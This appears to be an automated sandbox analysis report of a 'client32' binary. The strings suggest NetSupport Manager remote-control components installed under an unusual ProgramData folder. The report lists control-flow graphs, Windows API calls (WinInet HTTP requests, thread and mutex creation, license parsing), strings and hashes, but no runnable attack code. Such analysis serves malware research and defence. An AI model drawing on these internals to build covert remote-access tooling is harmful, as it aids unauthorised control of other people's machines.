                                                                                                control_flow_graph 902 11029bb0-11029c3e LoadLibraryA 903 11029c41-11029c46 902->903 904 11029c48-11029c4b 903->904 905 11029c4d-11029c50 903->905 906 11029c65-11029c6a 904->906 907 11029c52-11029c55 905->907 908 11029c57-11029c62 905->908 909 11029c99-11029ca5 906->909 910 11029c6c-11029c71 906->910 907->906 908->906 913 11029d4a-11029d4d 909->913 914 11029cab-11029cb7 call 11163a11 909->914 911 11029c73-11029c8a GetProcAddress 910->911 912 11029c8c-11029c8f InternetCloseHandle 910->912 911->912 915 11029c91-11029c93 SetLastError 911->915 912->909 917 11029d68-11029d80 InternetOpenA 913->917 918 11029d4f-11029d66 GetProcAddress 913->918 919 11029cbc-11029cc3 914->919 915->909 921 11029da4-11029db0 call 11163aa5 917->921 918->917 920 11029d99-11029da1 SetLastError 918->920 922 11029ce4-11029cf0 919->922 923 11029cc5-11029cde GetProcAddress 919->923 920->921 927 11029db6-11029de7 call 11142e60 call 11165250 921->927 928 1102a02a-1102a034 921->928 930 11029cf2-11029cfb GetLastError 922->930 932 11029d11-11029d13 922->932 923->922 926 11029d82-11029d8a SetLastError 923->926 926->930 955 11029de9-11029dec 927->955 956 11029def-11029e04 call 11081d30 * 2 927->956 928->903 934 1102a03a 928->934 930->932 933 11029cfd-11029d0f call 11163aa5 call 11163a11 930->933 936 11029d30-11029d3c 932->936 937 11029d15-11029d2e GetProcAddress 932->937 933->932 939 1102a04c-1102a04f 934->939 936->913 958 11029d3e-11029d47 936->958 937->936 943 11029d8f-11029d97 SetLastError 937->943 940 1102a051-1102a056 939->940 941 1102a05b-1102a05e 939->941 946 1102a1bf-1102a1c7 940->946 947 1102a060-1102a065 941->947 948 1102a06a 941->948 943->913 952 1102a1d0-1102a1e3 946->952 953 1102a1c9-1102a1ca FreeLibrary 946->953 954 1102a18f-1102a194 947->954 957 1102a06d-1102a075 948->957 953->952 962 1102a196-1102a1ad GetProcAddress 954->962 963 1102a1af-1102a1b5 954->963 955->956 975 11029e06-11029e0a 956->975 976 11029e0d-11029e19 956->976 960 1102a077-1102a08e GetProcAddress 957->960 961 1102a094-1102a09d 957->961 958->913 960->961 965 1102a14e-1102a150 SetLastError 960->965 969 1102a0a0-1102a0a2 961->969 962->963 966 1102a1b7-1102a1b9 SetLastError 962->966 963->946 967 1102a156-1102a15d 965->967 966->946 971 1102a16c-1102a18d call 11027f00 * 2 967->971 969->967 973 1102a0a8-1102a0ad 969->973 971->954 973->971 977 1102a0b3-1102a0ef call 11110230 call 11027eb0 973->977 975->976 979 11029e44-11029e49 976->979 980 11029e1b-11029e1d 976->980 1001 1102a101-1102a103 977->1001 1002 1102a0f1-1102a0f4 977->1002 982 11029e4b-11029e5c GetProcAddress 979->982 983 11029e5e-11029e75 InternetConnectA 979->983 985 11029e34-11029e3a 980->985 986 11029e1f-11029e32 GetProcAddress 980->986 982->983 990 11029ea1-11029eac SetLastError 982->990 991 1102a017-1102a027 call 11162777 983->991 992 11029e7b-11029e7e 983->992 985->979 986->985 988 11029e3c-11029e3e SetLastError 986->988 988->979 990->991 991->928 996 11029e80-11029e82 992->996 997 11029eb9-11029ec1 992->997 1003 11029e84-11029e97 GetProcAddress 996->1003 1004 11029e99-11029e9f 996->1004 999 11029ec3-11029ed7 GetProcAddress 997->999 1000 11029ed9-11029ef4 HttpOpenRequestA 997->1000 999->1000 1006 11029ef6-11029efe SetLastError 999->1006 1007 11029f01-11029f04 1000->1007 1009 1102a105 1001->1009 1010 1102a10c-1102a111 1001->1010 1002->1001 1008 1102a0f6-1102a0fa 1002->1008 1003->1004 1011 11029eb1-11029eb3 SetLastError 1003->1011 1004->997 1006->1007 1012 1102a012-1102a015 1007->1012 1013 11029f0a-11029f0f 1007->1013 1008->1001 1014 1102a0fc 1008->1014 1009->1010 1015 1102a113-1102a129 call 110d12e0 1010->1015 1016 1102a12c-1102a12e 1010->1016 1011->997 1012->991 1021 1102a03c-1102a049 call 11162777 1012->1021 1018 11029f11-11029f28 GetProcAddress 1013->1018 1019 11029f2a-11029f36 HttpSendRequestA 1013->1019 1014->1001 1015->1016 1022 1102a130-1102a132 1016->1022 1023 1102a134-1102a145 call 11162777 1016->1023 1018->1019 1025 11029f38-11029f40 SetLastError 1018->1025 1026 11029f42-11029f5b GetLastError 1019->1026 1021->939 1022->1023 1028 1102a15f-1102a169 call 11162777 1022->1028 1023->971 1035 1102a147-1102a149 1023->1035 1025->1026 1032 11029f76-11029f8b 1026->1032 1033 11029f5d-11029f74 GetProcAddress 1026->1033 1028->971 1039 11029f95-11029fa3 GetLastError 1032->1039 1033->1032 1037 11029f8d-11029f8f SetLastError 1033->1037 1035->957 1037->1039 1040 11029fa5-11029faa 1039->1040 1041 11029fac-11029fb8 GetDesktopWindow 1039->1041 1040->1041 1042 1102a002-1102a007 1040->1042 1043 11029fd3-11029fef 1041->1043 1044 11029fba-11029fd1 GetProcAddress 1041->1044 1042->1012 1046 1102a009-1102a00f 1042->1046 1043->1012 1048 11029ff1 1043->1048 1044->1043 1045 11029ff6-1102a000 SetLastError 1044->1045 1045->1012 1046->1012 1048->1007
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(WinInet.dll), ref: 11029BE5
                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029C7F
                                                                                                • InternetCloseHandle.WININET(000000FF), ref: 11029C8D
                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029C93
                                                                                                • _malloc.LIBCMT ref: 11029CB7
                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029CD1
                                                                                                • GetLastError.KERNEL32 ref: 11029CF2
                                                                                                • _free.LIBCMT ref: 11029CFE
                                                                                                • _malloc.LIBCMT ref: 11029D07
                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029D21
                                                                                                • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 11029D5B
                                                                                                • InternetOpenA.WININET(11195264,?,?,000000FF,00000000), ref: 11029D7A
                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029D84
                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029D91
                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029D9B
                                                                                                • _free.LIBCMT ref: 11029DA5
                                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
                                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E25
                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029E3E
                                                                                                • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029E51
                                                                                                • InternetConnectA.WININET(000000FF,1119A6C0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 11029E6E
                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029E8A
                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029EA3
                                                                                                • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029EC9
                                                                                                • HttpOpenRequestA.WININET(?,GET,1119A6D8,00000000,00000000,00000000,8040F000,00000000), ref: 11029EEF
                                                                                                • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 11029F1D
                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable,?), ref: 1102A083
                                                                                                • SetLastError.KERNEL32(00000078), ref: 1102A150
                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle,?,1117FC4B), ref: 1102A1A2
                                                                                                • SetLastError.KERNEL32(00000078), ref: 1102A1B9
                                                                                                • FreeLibrary.KERNEL32(?), ref: 1102A1CA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$ErrorLast$Internet$FreeLibraryOpen_free_malloc$CloseConnectHandleHeapHttpLoadRequest
                                                                                                • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                                • API String ID: 2589145992-913974648
                                                                                                • Opcode ID: 4120dbda5f7b8a65a157389820b932fd852e5028f54e685182759e8909351907
                                                                                                • Instruction ID: fedf281c9ee5d08c3a8f43e513d3e5c088d5a5ed6dab1fd82504b865b87691ba
                                                                                                • Opcode Fuzzy Hash: 4120dbda5f7b8a65a157389820b932fd852e5028f54e685182759e8909351907
                                                                                                • Instruction Fuzzy Hash: 8012AC70D40229DBEB11DFE5CC88AAEFBF8FF88754F604169E425A7600EB745980CB60
                                                                                                Function 69CF7030 Relevance: 89.7, APIs: 21, Strings: 30, Instructions: 406threadlibrarysynchronizationCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1049 69cf7030-69cf7050 call 69ce2a90 call 69cfdbd0 1054 69cf7097 1049->1054 1055 69cf7052-69cf7095 LoadLibraryA 1049->1055 1056 69cf7099-69cf70f8 call 69ce8d00 InitializeCriticalSection CreateEventA 1054->1056 1055->1056 1059 69cf70fa-69cf710e call 69ce6f50 1056->1059 1060 69cf7111-69cf711e CreateEventA 1056->1060 1059->1060 1061 69cf7137-69cf7144 CreateEventA 1060->1061 1062 69cf7120-69cf7134 call 69ce6f50 1060->1062 1066 69cf715d-69cf7170 WSAStartup 1061->1066 1067 69cf7146-69cf715a call 69ce6f50 1061->1067 1062->1061 1070 69cf7183-69cf71b2 call 69d01b69 1066->1070 1071 69cf7172-69cf7182 call 69ce5290 call 69ce2b70 1066->1071 1067->1066 1077 69cf71b4-69cf71cd call 69ce6f50 1070->1077 1078 69cf71d0-69cf71e4 call 69d01c50 1070->1078 1077->1078 1085 69cf71fa-69cf7202 1078->1085 1086 69cf71e6-69cf71e9 1078->1086 1088 69cf7209-69cf7223 _calloc 1085->1088 1089 69cf7204 1085->1089 1086->1085 1087 69cf71eb-69cf71f1 1086->1087 1087->1085 1090 69cf71f3-69cf71f8 1087->1090 1091 69cf723c-69cf7255 call 69cf9bf0 1088->1091 1092 69cf7225-69cf7239 call 69ce6f50 1088->1092 1089->1088 1090->1088 1097 69cf726a-69cf7271 call 69ce5730 1091->1097 1098 69cf7257-69cf725e 1091->1098 1092->1091 1102 69cf730b-69cf7310 1097->1102 1103 69cf7277-69cf729a call 69d01b69 1097->1103 1099 69cf7260-69cf7268 1098->1099 1099->1097 1099->1099 1104 69cf731e-69cf7336 call 69ce5e90 call 69ce5530 1102->1104 1105 69cf7312-69cf7315 1102->1105 1111 69cf72be-69cf72dc call 69d01c50 call 69d01b69 1103->1111 1112 69cf729c-69cf72bb call 69ce6f50 1103->1112 1110 69cf7339-69cf7354 call 69ce5e90 1104->1110 1105->1104 1108 69cf7317-69cf731c 1105->1108 1108->1104 1108->1110 1123 69cf7356-69cf735c 1110->1123 1124 69cf7361-69cf738b GetTickCount CreateThread 1110->1124 1128 69cf72de-69cf72f7 call 69ce6f50 1111->1128 1129 69cf72fa-69cf7308 call 69d01c50 1111->1129 1112->1111 1123->1124 1126 69cf738d-69cf73a6 call 69ce6f50 1124->1126 1127 69cf73a9-69cf73b6 SetThreadPriority 1124->1127 1126->1127 1131 69cf73cf-69cf73ed call 69ce5f20 call 69ce5e90 1127->1131 1132 69cf73b8-69cf73cc call 69ce6f50 1127->1132 1128->1129 1129->1102 1144 69cf73ef 1131->1144 1145 69cf73f5-69cf73f7 1131->1145 1132->1131 1144->1145 1146 69cf73f9-69cf7407 call 69cfdbd0 1145->1146 1147 69cf7425-69cf7447 GetModuleFileNameA call 69ce2420 1145->1147 1154 69cf741e 1146->1154 1155 69cf7409-69cf741c call 69ce4580 1146->1155 1152 69cf744c 1147->1152 1153 69cf7449-69cf744a 1147->1153 1156 69cf7451-69cf746d 1152->1156 1153->1156 1158 69cf7420 1154->1158 1155->1158 1159 69cf7470-69cf747f 1156->1159 1158->1147 1159->1159 1161 69cf7481-69cf7486 1159->1161 1162 69cf7487-69cf748d 1161->1162 1162->1162 1163 69cf748f-69cf74c8 GetPrivateProfileIntA GetModuleHandleA 1162->1163 1164 69cf74ce-69cf74fa call 69ce5e90 * 2 1163->1164 1165 69cf7563-69cf758f CreateMutexA timeBeginPeriod 1163->1165 1170 69cf74fc-69cf7511 call 69ce5e90 1164->1170 1171 69cf7536-69cf755d call 69ce5e90 * 2 1164->1171 1177 69cf752a-69cf7530 1170->1177 1178 69cf7513-69cf7528 call 69ce5e90 1170->1178 1171->1165 1177->1171 1178->1171 1178->1177
                                                                                                APIs
                                                                                                  • Part of subcall function 69CE2A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 69CE2ACB
                                                                                                  • Part of subcall function 69CE2A90: _strrchr.LIBCMT ref: 69CE2ADA
                                                                                                  • Part of subcall function 69CE2A90: _strrchr.LIBCMT ref: 69CE2AEA
                                                                                                  • Part of subcall function 69CE2A90: wsprintfA.USER32 ref: 69CE2B05
                                                                                                  • Part of subcall function 69CFDBD0: _malloc.LIBCMT ref: 69CFDBE9
                                                                                                  • Part of subcall function 69CFDBD0: wsprintfA.USER32 ref: 69CFDC04
                                                                                                  • Part of subcall function 69CFDBD0: _memset.LIBCMT ref: 69CFDC27
                                                                                                • LoadLibraryA.KERNEL32(WinInet.dll), ref: 69CF7057
                                                                                                • InitializeCriticalSection.KERNEL32(69D2B898), ref: 69CF70DF
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 69CF70EF
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 69CF7115
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 69CF713B
                                                                                                • WSAStartup.WSOCK32(00000101,69D2B91A), ref: 69CF7167
                                                                                                • _malloc.LIBCMT ref: 69CF71A3
                                                                                                  • Part of subcall function 69D01B69: __FF_MSGBANNER.LIBCMT ref: 69D01B82
                                                                                                  • Part of subcall function 69D01B69: __NMSG_WRITE.LIBCMT ref: 69D01B89
                                                                                                  • Part of subcall function 69D01B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,69D0D3C1,69D06E81,00000001,69D06E81,?,69D0F447,00000018,69D27738,0000000C,69D0F4D7), ref: 69D01BAE
                                                                                                • _memset.LIBCMT ref: 69CF71D3
                                                                                                • _calloc.LIBCMT ref: 69CF7214
                                                                                                • _malloc.LIBCMT ref: 69CF728B
                                                                                                • _memset.LIBCMT ref: 69CF72C1
                                                                                                • _malloc.LIBCMT ref: 69CF72CD
                                                                                                • _memset.LIBCMT ref: 69CF7303
                                                                                                • GetTickCount.KERNEL32 ref: 69CF7361
                                                                                                • CreateThread.KERNEL32(00000000,00004000,69CF6BA0,00000000,00000000,69D2BACC), ref: 69CF737E
                                                                                                • SetThreadPriority.KERNEL32(00000000,00000001), ref: 69CF73AC
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\i99ekubc\Support\,00000104), ref: 69CF7430
                                                                                                • GetPrivateProfileIntA.KERNEL32(htctl.packet_tracing,mode,00000000,C:\ProgramData\i99ekubc\Support\pci.ini), ref: 69CF74B0
                                                                                                • GetModuleHandleA.KERNEL32(nsmtrace), ref: 69CF74C0
                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 69CF7566
                                                                                                • timeBeginPeriod.WINMM(00000001), ref: 69CF7573
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$_malloc_memset$EventModule$FileNameThread_strrchrwsprintf$AllocateBeginCountCriticalHandleHeapInitializeLibraryLoadMutexPeriodPriorityPrivateProfileSectionStartupTick_calloctime
                                                                                                • String ID: (iflags & CTL_REMOTE) == 0$*CMPI$*DisconnectTimeout$445817$C:\ProgramData\i99ekubc\Support\$C:\ProgramData\i99ekubc\Support\pci.ini$General$HTCTL32$NSM303008$NetworkSpeed$Support\$Trace$TraceFile$TraceRecv$TraceSend$WinInet.dll$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$htctl.packet_tracing$mode$nsmtrace$pci.ini$sv.ResumeEvent$sv.gateways$sv.hRecvThread$sv.hRecvThreadReadyEvent$sv.hResponseEvent$sv.s$sv.subset.omit$sv.subset.subset
                                                                                                • API String ID: 3160247386-3641689268
                                                                                                • Opcode ID: 47459139e04d9257851be2a8d456fafedf8dd6c698d21500f71969a6ea33eba0
                                                                                                • Instruction ID: 86ce0dcd702fc042ddfc2814c493e0d8270ffdc890029659ac0374cfab906563
                                                                                                • Opcode Fuzzy Hash: 47459139e04d9257851be2a8d456fafedf8dd6c698d21500f71969a6ea33eba0
                                                                                                • Instruction Fuzzy Hash: 4CD1D5F59003446FEB10DF34AC81B1A7BA8BB0A34CB84D479F709E7A41F77598499BA1
                                                                                                Function 1111C990 Relevance: 79.4, APIs: 23, Strings: 22, Instructions: 634COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetSystemMetrics.USER32(0000004C,?,00000000,?,1104C49F), ref: 1111C9E2
                                                                                                • SystemParametersInfoA.USER32(00000025,00000000,00000000,00000000), ref: 1111C9F8
                                                                                                • SystemParametersInfoA.USER32(00000026,00000000,0212FBE0,00000000), ref: 1111CA0A
                                                                                                • SystemParametersInfoA.USER32(00000049,00000008,00000008,00000000), ref: 1111CA60
                                                                                                • SystemParametersInfoA.USER32(00000048,00000008,00000008,00000000), ref: 1111CA75
                                                                                                • SystemParametersInfoA.USER32(00001002,00000000,0212FBF0,00000000), ref: 1111CAD9
                                                                                                • SystemParametersInfoA.USER32(00001005,00000000,00000000,00000000), ref: 1111CB1F
                                                                                                • SystemParametersInfoA.USER32(00001004,00000000,0212FBE8,00000000), ref: 1111CB37
                                                                                                • SystemParametersInfoA.USER32(00001007,00000000,00000000,00000000), ref: 1111CB7D
                                                                                                • SystemParametersInfoA.USER32(00001006,00000000,0212FBEC,00000000), ref: 1111CB95
                                                                                                • SystemParametersInfoA.USER32(0000101B,00000000,00000000,00000000), ref: 1111CBDB
                                                                                                • SystemParametersInfoA.USER32(0000101A,00000000,0212FBF4,00000000), ref: 1111CBF3
                                                                                                • SystemParametersInfoA.USER32(00001015,00000000,00000000,00000000), ref: 1111CC39
                                                                                                • SystemParametersInfoA.USER32(00001014,00000000,0212FBF8,00000000), ref: 1111CC51
                                                                                                • SystemParametersInfoA.USER32(00001017,00000000,00000000,00000000), ref: 1111CC97
                                                                                                • SystemParametersInfoA.USER32(00001016,00000000,0212FBFC,00000000), ref: 1111CCAF
                                                                                                • SystemParametersInfoA.USER32(00001025,00000000,00000000,00000000), ref: 1111CCF5
                                                                                                • SystemParametersInfoA.USER32(00001024,00000000,0212FC00,00000000), ref: 1111CD0D
                                                                                                • SystemParametersInfoA.USER32(00001009,00000000,00000000,00000000), ref: 1111CDBF
                                                                                                • SystemParametersInfoA.USER32(00001008,00000000,0212FC08,00000000), ref: 1111CDD7
                                                                                                • SystemParametersInfoA.USER32(0000004B,00000000,00000000,00000000), ref: 1111CE1A
                                                                                                • SystemParametersInfoA.USER32(0000004A,00000000,0212FC0C,00000000), ref: 1111CE2F
                                                                                                • SystemParametersInfoA.USER32(00001003,00000000,00000000,00000000), ref: 1111CAC1
                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: System$InfoParameters$Metrics__wcstoi64
                                                                                                • String ID: EnableAnimation$EnableCBAnimation$EnableDragFullWindows$EnableDropShadow$EnableFontSmoothing$EnableGradientCaptions$EnableIESmoothScroll$EnableLBSmoothScroll$EnableLVAlphaSelect$EnableLVShadow$EnableLVWatermark$EnableMenuAnimation$EnableSelectionFade$EnableShadowCursor$EnableTBAnimations$EnableTTAnimation$EnableTVSmoothScroll$ListviewAlphaSelect$ListviewShadow$ListviewWatermark$SmoothScroll$TaskbarAnimations
                                                                                                • API String ID: 3799663137-3751266815
                                                                                                • Opcode ID: e3688bc42a37d2216d756e178c68f462f9839354e24246aecb4cea1edeb831f9
                                                                                                • Instruction ID: bf678e33c67380cbbf5bb6d1fd1adca19844daef576a9ba588db8e9803c6ea1e
                                                                                                • Opcode Fuzzy Hash: e3688bc42a37d2216d756e178c68f462f9839354e24246aecb4cea1edeb831f9
                                                                                                • Instruction Fuzzy Hash: 2612A631600B42AAF720CF76CE44FABFBB5EB84B44F40442CA5469E5C8DAB4F441C799
                                                                                                Function 110627B0 Relevance: 76.5, APIs: 22, Strings: 21, Instructions: 1221COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 11145A70: GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                                                  • Part of subcall function 11145A70: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                                                • _fgets.LIBCMT ref: 110628E2
                                                                                                • _strpbrk.LIBCMT ref: 11062949
                                                                                                • _fgets.LIBCMT ref: 11062A4C
                                                                                                • _strpbrk.LIBCMT ref: 11062AC3
                                                                                                • __wcstoui64.LIBCMT ref: 11062ADC
                                                                                                • _fgets.LIBCMT ref: 11062B55
                                                                                                • _strpbrk.LIBCMT ref: 11062B7B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                                • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                                • API String ID: 716802716-1571441106
                                                                                                • Opcode ID: 8126f7cd9e3a1b402a01001153baca8519216a1c208268375f46667bbc0d5a8d
                                                                                                • Instruction ID: a72cdd11ea0a2970362cd59f127853d680cd45206dcb20ec64d0abc9fb05f950
                                                                                                • Opcode Fuzzy Hash: 8126f7cd9e3a1b402a01001153baca8519216a1c208268375f46667bbc0d5a8d
                                                                                                • Instruction Fuzzy Hash: 7DA2C475E0465A9FEB11CF64DC40BEFB7B8AF44345F0441D8E849AB280EB71AA45CF91
                                                                                                Function 69CEA980 Relevance: 56.4, APIs: 28, Strings: 4, Instructions: 389networkCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
